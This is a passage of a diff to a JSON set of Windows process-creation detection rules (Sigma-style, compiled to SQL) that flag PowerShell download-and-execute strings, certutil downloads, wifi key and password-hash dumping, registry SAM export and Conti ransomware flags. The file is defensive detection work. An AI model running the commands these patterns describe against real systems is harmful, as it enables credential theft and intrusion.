'\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "title": "Unusual Parent Process For Cmd.EXE", + "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "description": "Detects suspicious parent process for cmd.exe", + "author": "Tim Rauch", 
"tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": 
"proc_creation_win_cmd_unusual_parent.yml" }, { - "title": "VsCode Child Process Anomaly", - "id": "5a3164f2-b373-4152-93cf-090b13c12d27", + "title": "Suspicious ScreenSave Change by Reg.exe", + "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1546.002" ], "falsepositives": [ - "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. 
Remove or add processes accordingly" + "GPO" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\code.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t 
REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" + "filename": "proc_creation_win_reg_screensaver.yml" }, { - "title": "Potential Windows Defender Tampering Via Wmic.EXE", - "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", - "status": "experimental", - "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", - "author": "frack113", + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", + "status": "test", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_namespace_defender.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": 
"experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' 
ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "Suspicious Scan Loop Network", - "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "title": "Potential DLL Injection Or Execution Using Tracker.exe", + "id": "148431ce-4b70-403d-8525-fcc2993f29ea", "status": "test", - "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", - "author": "frack113", + "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ - "attack.execution", - "attack.t1059", - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_network_scan_loop.yml" + "filename": "proc_creation_win_lolbin_tracker.yml" }, { - "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", - "id": "eee00933-a761-4cd0-be70-c42fe91731e7", - "status": "test", - "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", - "author": "Victor Sergeev, oscd.community", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", + "status": "experimental", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "title": "Suspicious File Downloaded 
From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", - "id": "42b1a5b8-353f-4f10-b256-39de4467faff", - "status": "test", - "description": "Detect the harvesting of wifi credentials using netsh.exe", - "author": "Andreas Hunkeler (@Karneades), oscd.community", + "title": "Ilasm Lolbin Use Compile C-Sharp", + "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "status": "experimental", + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" ], - "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" + "filename": "proc_creation_win_lolbin_ilasm.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line 
to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, 
{ - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", - "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "title": "Suspicious Diantz Alternate Data Stream Execution", + "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", + "status": "test", + "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Authorized administrative activity" + "Very Possible" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_lolbin_diantz_ads.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", - "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": 
"Florian Roth (Nextron Systems)", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "status": "test", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", - "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. 
Which is often used by attackers to perform AD enumeration.", - "author": "frack113", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.t1027", "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + 
"attack.t1216" ], "falsepositives": [ - "Administrative script libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Lolbin Defaultpack.exe Use As Proxy", - "id": "b2309017-4235-44fe-b5af-b15363011957", + "title": "Suspicious Invoke-WebRequest Execution", + "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "status": "experimental", - "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", - "author": "frack113", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1218", - "attack.defense_evasion", - "attack.execution" + 